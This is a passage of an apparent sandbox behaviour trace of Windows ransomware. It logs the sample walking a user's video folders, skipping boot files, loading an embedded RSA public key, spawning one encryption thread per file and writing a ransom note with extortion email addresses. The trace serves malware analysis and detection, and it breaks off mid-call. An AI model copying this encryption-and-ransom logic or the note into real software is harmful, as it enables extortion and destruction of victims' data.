MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0129.848] lstrcpyW (in: lpString1=0x17be7c, lpString2="ArnUUg6o.mkv" | out: lpString1="ArnUUg6o.mkv") returned="ArnUUg6o.mkv" [0129.848] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0129.848] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x678 [0129.848] Sleep (dwMilliseconds=0x96) [0130.052] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0130.052] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0130.052] FindClose (in: hFindFile=0x3cde5d8 | out: hFindFile=0x3cde5d8) returned 1 [0130.053] FindClose (in: hFindFile=0x3cde5d8 | out: hFindFile=0x3cde5d8) returned 0 [0130.053] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" [0130.053] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*" [0130.053] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpSrch="Desktop") returned 0x0 [0130.053] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpSrch="DESKTOP") returned 0x0 [0130.053] SetErrorMode (uMode=0x1) returned 0x1 [0130.053] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\_HELP_INSTRUCTION.TXT") returned 76 [0130.053] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0130.053] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0130.053] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x670) returned 0x0 [0130.053] RegQueryValueExW (in: hKey=0x670, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cea630, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3cea630*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0130.054] RegCloseKey (hKey=0x670) returned 0x0 [0130.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0130.054] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0130.054] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0130.054] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x670 [0130.054] WriteFile (in: hFile=0x670, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0130.055] CloseHandle (hObject=0x670) returned 1 [0130.055] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cde5d8 [0130.055] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="DTMS 07a7Aq-XEUh0" [0130.055] lstrcpyW (in: lpString1=0x17b644, lpString2="DTMS 07a7Aq-XEUh0" | out: lpString1="DTMS 07a7Aq-XEUh0") returned="DTMS 07a7Aq-XEUh0" [0130.055] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0130.055] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0130.055] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0130.055] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0130.055] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0130.055] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0130.055] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0130.055] lstrcmpW (lpString1="2SS69ds5b7DlSJShTY0o", lpString2="..") returned 1 [0130.055] lstrcmpW (lpString1="2SS69ds5b7DlSJShTY0o", lpString2=".") returned 1 [0130.056] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" [0130.056] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0130.056] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpString2="2SS69ds5b7DlSJShTY0o" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o" [0130.056] SetErrorMode (uMode=0x1) returned 0x1 [0130.056] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o" [0130.056] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0130.056] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0130.056] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*" [0130.056] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cde658 [0130.094] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o") returned="2SS69ds5b7DlSJShTY0o" [0130.094] lstrcpyW (in: lpString1=0x17a5a4, lpString2="2SS69ds5b7DlSJShTY0o" | out: lpString1="2SS69ds5b7DlSJShTY0o") returned="2SS69ds5b7DlSJShTY0o" [0130.094] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0130.094] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0130.094] lstrcmpW (lpString1="7TSkSEjcLf8xikPUr.avi", lpString2="..") returned 1 [0130.094] lstrcmpW (lpString1="7TSkSEjcLf8xikPUr.avi", lpString2=".") returned 1 [0130.094] StrStrW (lpFirst="7TSkSEjcLf8xikPUr.avi", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0130.094] StrStrW (lpFirst="7TSkSEjcLf8xikPUr.avi", lpSrch="ntldr") returned 0x0 [0130.094] StrStrW (lpFirst="7TSkSEjcLf8xikPUr.avi", lpSrch="NTLDR") returned 0x0 [0130.094] StrStrW (lpFirst="7TSkSEjcLf8xikPUr.avi", lpSrch="NTDETECT.COM") returned 0x0 [0130.094] StrStrW (lpFirst="7TSkSEjcLf8xikPUr.avi", lpSrch="ntdetect.com") returned 0x0 [0130.094] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="Desktop") returned 0x0 [0130.094] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="DESKTOP") returned 0x0 [0130.094] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0130.094] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0130.094] lstrcpyW (in: lpString1=0x17addc, lpString2="7TSkSEjcLf8xikPUr.avi" | out: lpString1="7TSkSEjcLf8xikPUr.avi") returned="7TSkSEjcLf8xikPUr.avi" [0130.094] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0130.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x67c [0130.095] Sleep (dwMilliseconds=0x96) [0130.311] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0130.311] lstrcmpW (lpString1="bAFZ2xGuKI.swf", lpString2="..") returned 1 [0130.311] lstrcmpW (lpString1="bAFZ2xGuKI.swf", lpString2=".") returned 1 [0130.311] StrStrW (lpFirst="bAFZ2xGuKI.swf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0130.311] StrStrW (lpFirst="bAFZ2xGuKI.swf", lpSrch="ntldr") returned 0x0 [0130.311] StrStrW (lpFirst="bAFZ2xGuKI.swf", lpSrch="NTLDR") returned 0x0 [0130.311] StrStrW (lpFirst="bAFZ2xGuKI.swf", lpSrch="NTDETECT.COM") returned 0x0 [0130.311] StrStrW (lpFirst="bAFZ2xGuKI.swf", lpSrch="ntdetect.com") returned 0x0 [0130.311] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="Desktop") returned 0x0 [0130.311] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="DESKTOP") returned 0x0 [0130.311] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0130.311] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0130.311] lstrcpyW (in: lpString1=0x17addc, lpString2="bAFZ2xGuKI.swf" | out: lpString1="bAFZ2xGuKI.swf") returned="bAFZ2xGuKI.swf" [0130.311] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0130.311] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x684 [0130.311] Sleep (dwMilliseconds=0x96) [0130.487] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0130.487] lstrcmpW (lpString1="ibE0v-Egfbu047ynw.swf", lpString2="..") returned 1 [0130.487] lstrcmpW (lpString1="ibE0v-Egfbu047ynw.swf", lpString2=".") returned 1 [0130.487] StrStrW (lpFirst="ibE0v-Egfbu047ynw.swf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0130.487] StrStrW (lpFirst="ibE0v-Egfbu047ynw.swf", lpSrch="ntldr") returned 0x0 [0130.487] StrStrW (lpFirst="ibE0v-Egfbu047ynw.swf", lpSrch="NTLDR") returned 0x0 [0130.487] StrStrW (lpFirst="ibE0v-Egfbu047ynw.swf", lpSrch="NTDETECT.COM") returned 0x0 [0130.487] StrStrW (lpFirst="ibE0v-Egfbu047ynw.swf", lpSrch="ntdetect.com") returned 0x0 [0130.487] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="Desktop") returned 0x0 [0130.487] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="DESKTOP") returned 0x0 [0130.487] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0130.487] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0130.487] lstrcpyW (in: lpString1=0x17addc, lpString2="ibE0v-Egfbu047ynw.swf" | out: lpString1="ibE0v-Egfbu047ynw.swf") returned="ibE0v-Egfbu047ynw.swf" [0130.487] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0130.487] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x690 [0130.488] Sleep (dwMilliseconds=0x96) [0130.721] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0130.721] lstrcmpW (lpString1="MI1L.flv", lpString2="..") returned 1 [0130.721] lstrcmpW (lpString1="MI1L.flv", lpString2=".") returned 1 [0130.721] StrStrW (lpFirst="MI1L.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0130.721] StrStrW (lpFirst="MI1L.flv", lpSrch="ntldr") returned 0x0 [0130.721] StrStrW (lpFirst="MI1L.flv", lpSrch="NTLDR") returned 0x0 [0130.721] StrStrW (lpFirst="MI1L.flv", lpSrch="NTDETECT.COM") returned 0x0 [0130.721] StrStrW (lpFirst="MI1L.flv", lpSrch="ntdetect.com") returned 0x0 [0130.721] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="Desktop") returned 0x0 [0130.721] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="DESKTOP") returned 0x0 [0130.721] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0130.721] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0130.721] lstrcpyW (in: lpString1=0x17addc, lpString2="MI1L.flv" | out: lpString1="MI1L.flv") returned="MI1L.flv" [0130.721] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0130.721] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x688 [0130.722] Sleep (dwMilliseconds=0x96) [0131.030] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0131.030] lstrcmpW (lpString1="No0nJ8TKbF9hYhiurGN.mp4", lpString2="..") returned 1 [0131.030] lstrcmpW (lpString1="No0nJ8TKbF9hYhiurGN.mp4", lpString2=".") returned 1 [0131.030] StrStrW (lpFirst="No0nJ8TKbF9hYhiurGN.mp4", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0131.030] StrStrW (lpFirst="No0nJ8TKbF9hYhiurGN.mp4", lpSrch="ntldr") returned 0x0 [0131.030] StrStrW (lpFirst="No0nJ8TKbF9hYhiurGN.mp4", 